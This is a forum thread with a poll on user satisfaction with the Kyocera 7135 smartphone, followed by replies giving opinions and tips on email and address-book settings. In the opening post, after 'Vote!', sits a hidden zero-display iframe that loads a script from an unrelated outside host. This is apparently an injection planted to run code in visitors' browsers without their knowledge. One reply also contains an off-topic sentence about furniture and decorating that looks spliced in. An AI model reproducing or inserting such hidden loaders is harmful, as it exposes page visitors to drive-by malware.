Poll: What's Your Overall Take On The 7135?

+ Reply to Thread
Page 1 of 2 1 2 LastLast

Here It Is!!! 7135 Poll For Everyone!!!

Vote!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Mods, please leave this thread here instead of putting it in the polls section. Hopefully if it is here enough people will see it and vote to get a large enough critical mass of users for some of the prospective owners to get an idea of the satisfied/dissatisfied ratio.

PS, I voted worth every penny, and I bought it back at the GetConnected/Alltell would-you-like-some-vaseline-with-that price, so it's worth substantially more pennies to me than to you lucky Verizon-price folks...
    ---------------
    The same thing we do every night, Pinky...

BrerLapn, do you think the catagories are broad enough? I thought 3 would be cool for people to get a good idea...

I think three categories should be enough. People who want to return it can vote "not ready for primetime", and those who are keeping it get two choices--"ringing endorsement" or "good but not great but I'm still happy". They can always post if they want to be more nuanced.
    ---------------
    The same thing we do every night, Pinky...

My 7135 makes me very very happy
    Please visit my picture site: Robert-O-Rama :)

My 7135 makes me very very very very very happy
    iPhone therefore iAm.

Can I vote more than once? I love my 7135!

I do like to whine, though, as do most of us here, looks like. I venture to say that no computer-based product will EVER be produced that techno-geeks like us won't be able to find something to complain about!

St

Originally posted by Steve
    My 7135 makes me very very very very very happy
    LOL :p
    Please visit my picture site: Robert-O-Rama :)

A fair amount so far have an "ok" thought about the 7135.

I must admit myself, there are a few quirks but overall.....

Great phone...

Fully Converged
    Okay, the middle of the pacific (with the first 7135 to be delivered in the State, according to Verizon) is very happy! :angel2
    From the Middle of the Sea ;-)

I chose "just OK" but I 'd actually rate it between that and "great." People considering a 7135 who read all the complaints on this board may get the idea that the phone is hopelessly buggy, which it is not. It is a new and complex package of technology, however, and some users have had phones with serious flaws. Beyond that, potential buyers should know their own limitations. The 7135 is not for the techno-phobic.

I am a contributor to the "Outstranding combo phone/PDA" option. The phone isn't perfect, but it is damned close and it fulfills all of my smartphone needs wonderfully!
    Dave

Great combo with almost NO quirks now that I've settled in. In this new home, I've refinished a few old furniture pieces and bought a couple nice new ones which fit better. I continue to visit SPS for decorating ideas.

Just yesterday, I learned how to initiate email from the Addressbook app. That was NOT in the User Guide! (Maybe it was buried in a reference manual?) With the many emails I send to my secretary and others who don't have pagers all week, that tip will save me some time.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

Originally posted by Beryl
    . . . .Just yesterday, I learned how to initiate email from the Addressbook app. That was NOT in the User Guide! (Maybe it was buried in a reference manual?) With the many emails I send to my secretary and others who don't have pagers all week, that tip will save me some time.
    Just how DO you initiate email from the Addess Book?

I love my 7135 except that they totally blew the voice memo utility. I used to be able to record a voice memo with one had in the dark while driving. Now you have to open the phone, click here, click there, click again. I might as well get out the keyboard and type the memo.

Frank

Originally posted by The Larch
    Just how DO you initiate email from the Addess Book?
    http://www.smartphonesource.com/vbul...5853#post65853
    (Thanks, Nick!)

Originally posted by Beryl
    http://www.smartphonesource.com/vbul...5853#post65853
    (Thanks, Nick!)
    Works great. Thanks! Now, . . . is there a way to set SnapperMail as the default? The shortcut described only opens Eudora. (Picky- picky. . .)

Administrator
    if you want to mess with the registry of the phone, you could get snappermail to be the default...

wwk
    Actually, within Snappers General Preferences menu is an option you can check to make it your default e-mail... it seems to work, though I can't check for certain, since I'm having some e-mail problems as discussed at the following post... http://www.smartphonesource.com/vbul...&threadid=7329
    I'd appreciate any thoughts on my problem described there.

Originally posted by marctronixx
    if you want to mess with the registry of the phone, you could get snappermail to be the default...
    Now if we could only change the default browser from EIS (what you get when you select a URL from the address book app), I'd be elated. Eudora Web would be better than EIS but I'd rather select Xiino.